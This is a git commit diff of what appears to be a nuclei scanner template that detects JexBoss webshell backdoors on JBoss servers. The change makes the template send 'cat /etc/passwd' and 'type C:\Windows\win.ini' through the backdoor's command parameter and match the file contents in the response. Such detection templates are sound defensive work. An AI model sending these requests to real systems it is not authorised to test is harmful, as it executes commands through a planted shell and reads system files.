Update jexboss-backdoor.yaml

patch-1
Prince Chaddha 2021-12-21 20:57:06 +05:30 committed by GitHub
parent 3184c32ecf
commit 89467e5e14
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 15 additions and 12 deletions

View File

@ -12,22 +12,25 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/jexws/jexws.jsp?ppp=echo%20pwn3d"
- "{{BaseURL}}/jexws4/jexws4.jsp?ppp=echo%20pwn3d"
- "{{BaseURL}}/jexinv4/jexinv4.jsp?ppp=echo%20pwn3d"
- "{{BaseURL}}/jbossass/jbossass.jsp?ppp=echo%20pwn3d"
- "{{BaseURL}}/jexws/jexws.jsp?ppp={{url_encode('§command§')}}"
- "{{BaseURL}}/jexws4/jexws4.jsp?ppp={{url_encode('§command§')}}"
- "{{BaseURL}}/jexinv4/jexinv4.jsp?ppp={{url_encode('§command§')}}"
- "{{BaseURL}}/jbossass/jbossass.jsp?ppp={{url_encode('§command§')}}"
payloads:
command:
- "cat /etc/passwd"
- "type C:\\/Windows\\/win.ini"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
- type: regex
part: body
words:
- "pwn3d"
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or
- type: word
part: header